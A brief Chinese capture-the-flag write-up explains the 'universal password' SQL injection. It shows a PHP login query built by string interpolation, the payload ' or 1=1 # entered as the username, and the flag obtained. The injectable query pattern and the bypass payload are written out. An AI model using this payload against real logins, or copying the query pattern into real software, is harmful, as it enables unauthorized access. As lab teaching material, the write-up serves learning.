0x01 相关知识
1.万能密码原理:
$sql = "SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'";
$res = $dbConnect->query($sql);
以上就是典型的sql语句,输入 ' or 1=1 # 之后sql语句就变成了:
$sql = "SELECT * FROM user WHERE username = ' 'or 1=1 # ' AND password = ' 'or1=1 # ' ";
0x02 漏洞利用
1. 直接在账号上输入' or 1=1 # 密码随便输入
2.得到flag:htryyujryfhyjtrjn
0x03 结语